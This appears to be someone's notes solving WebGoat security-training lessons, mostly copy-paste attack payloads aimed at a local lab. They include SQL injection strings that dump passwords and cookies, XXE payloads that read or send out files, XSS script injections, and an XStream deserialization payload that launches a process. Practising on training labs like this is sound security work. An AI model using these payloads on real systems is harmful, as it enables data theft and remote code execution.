93 lines
2.8 KiB
Plaintext
93 lines
2.8 KiB
Plaintext
### SQLi ###
|
|
Basic
|
|
Smith - to show it returns smith's records
|
|
Smith' or '1'='1 - to show exploit; 1=1 can be any true clause
|
|
|
|
**Bender Login
|
|
bender@juice-sh.op' --
|
|
|
|
[2:19 PM]
|
|
101
|
|
101 or 1=1
|
|
|
|
Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data --
|
|
Smith' union select all 1, '2' ,user_name,password, 'MC', cookie, 2 from user_system_data --
|
|
|
|
## XXE ##
|
|
|
|
Simple - <?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text>&root;</text></comment>
|
|
|
|
Modern Rest Framework - change content type to: Content-Type: application/xml &&
|
|
<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user> <username>&root;</username><password>test</password></user>
|
|
|
|
Blind SendFile ...
|
|
|
|
/**
|
|
* Solution:
|
|
*
|
|
* Create DTD:
|
|
*
|
|
* <pre>
|
|
* <?xml version="1.0" encoding="UTF-8"?>
|
|
* <!ENTITY % file SYSTEM "file:///c:/windows-version.txt">
|
|
* <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=%file;'>">
|
|
* %all;
|
|
* </pre>
|
|
*
|
|
* This will be reduced to:
|
|
*
|
|
* <pre>
|
|
* <!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]'>
|
|
* </pre>
|
|
*
|
|
* Wire it all up in the xml send to the server:
|
|
*
|
|
* <pre>
|
|
* <?xml version="1.0"?>
|
|
* <!DOCTYPE root [
|
|
* <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
|
|
* %remote;
|
|
* ]>
|
|
* <user>
|
|
* <username>test&send;</username>
|
|
* </user>
|
|
*
|
|
* </pre>
|
|
*
|
|
*/
|
|
|
|
###XSS ###
|
|
|
|
<script>alert('my javascript here')</script>4128 3214 0002 1999
|
|
|
|
DOM-XSS ...
|
|
|
|
// something like ... http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
|
|
// or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
|
|
|
|
|
|
### Vuln - Components ###
|
|
|
|
Jquery page: - it is contrived; but paste that in each box
|
|
OK<script>alert("XSS")<\/script>
|
|
OK<script>alert("XSS")<\/script>
|
|
|
|
for the deserialization: got to the link: http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/ to read about why it works so you can talk to it.
|
|
|
|
<sorted-set>
|
|
<string>foo</string>
|
|
<dynamic-proxy>
|
|
<interface>java.lang.Comparable</interface>
|
|
<handler class="java.beans.EventHandler">
|
|
<target class="java.lang.ProcessBuilder">
|
|
<command>
|
|
<string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
|
|
</command>
|
|
</target>
|
|
<action>start</action>
|
|
</handler>
|
|
</dynamic-proxy>
|
|
</sorted-set>
|
|
|
|
|